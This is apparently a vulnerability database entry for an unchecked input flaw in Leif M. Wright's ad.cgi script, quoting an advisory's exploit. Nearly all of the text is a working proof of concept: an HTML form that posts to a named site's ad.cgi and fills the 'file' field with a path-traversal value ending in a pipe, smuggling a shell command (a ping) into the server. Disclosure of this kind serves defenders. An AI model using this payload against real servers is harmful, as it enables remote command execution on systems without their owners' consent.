• info
• discussion
• exploit
• solution
• references

Leif M. Wright ad.cgi Unchecked Input Vulnerability

From the advisory by rpc <h@ckz.org> :

<html>
<form action="http://www.conservatives.net/someplace/ad.cgi" method=POST>
<h1>ad.cgi exploit</h1>
Command: <input type=text name=file value="../../../../../../../../bin/ping -c 5 www.foo.com|">
<input type=submit value=run>
</form>
</html>